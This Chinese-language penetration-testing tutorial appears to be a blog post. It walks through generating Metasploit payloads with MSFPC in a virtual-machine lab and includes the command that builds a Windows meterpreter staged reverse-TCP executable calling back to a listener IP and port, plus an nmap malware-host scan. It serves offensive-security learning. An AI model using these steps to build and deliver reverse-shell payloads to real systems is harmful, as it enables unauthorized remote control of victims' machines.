课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分 一、背景介绍 一般来说,生成payload的默认工具是MSFvenom,这是一个独立于Metasploit的payload生成器及编码器。虽然它是一个非常强大的payload生成神器,但是对于一些新手来说,可能难以在短时间内熟悉其操作。即使在进行最初的了解之后,生成一个基本的payload也需要输入相当多的内容,而今天,我们将看到使用MSFPC更便捷地生成paylaod。 MSFPC,或者说是MSFvenom Payload生成器,其实是一个基于MSFvenom的Payload生成器,但是它旨在简化基本的有效载荷创建过程,用户使用MSFPC可以尽可能简单地创建Payload,有时甚至只需要一个参数!如果你以前使用过MSFvenom,那么可能已经自行编写了一个简单的shell脚本来自动化频繁地生成Payload。即使这样,这个工具也绝对值得一试。
二、资源装备 1.安装好 Kali Linux 的虚拟机一台; 2.kali linux 受害者虚拟机一个; 3.整装待发的小白一个。
三、战略安排 3.1 通过Nmap脚本扫描WEB服务器或个人计算机是否被植入木马 命令:nmap --script=http-malware-host IP 命令:nmap --script=http-malware-host 192.168.0.103
3.2 nmap扫描结果如下图所示。 Host appears to be clean表示扫描的主机没有被植入木马。
3.3 普通的经常使用的Payload生成器简单介绍,如下图所示。 命令:msfvenom
3.4 利用命令行查看msfpc payload生成器生成的payload类别。 命令:msfpc 命令:msfpc --help
3.5 查看即将充当监听主机的主机IP地址,如下图所示。 命令:ifconfig
3.6 利用msfpc开始监听端口并且生成相应的payload,如下图所示。 命令:msfpc windows IP port 命令:msfpc windows 192.168.0.104 555
3.7 查看msfpc工具生成的payload信息,如下图所示。 命令:ls 文件: windows-meterpreter-staged-reverse-tcp-555.exe 文件: windows-meterpreter-staged-reverse-tcp-555.exe.rc(payload配置信息)
3.8 查看“windows-meterpreter-staged-reverse-tcp-555.exe.rc”的文件内容,如下图所示。
辛苦原创,你的每一次评论点赞和关注,都是我们源源不断的创作动力哦!你也可搜索:Kali 与编程,学习更多 Kali Linux 渗透与白帽编程技巧呢! 点我学习更多Kali Linux渗透测试与网络攻防实战技巧!
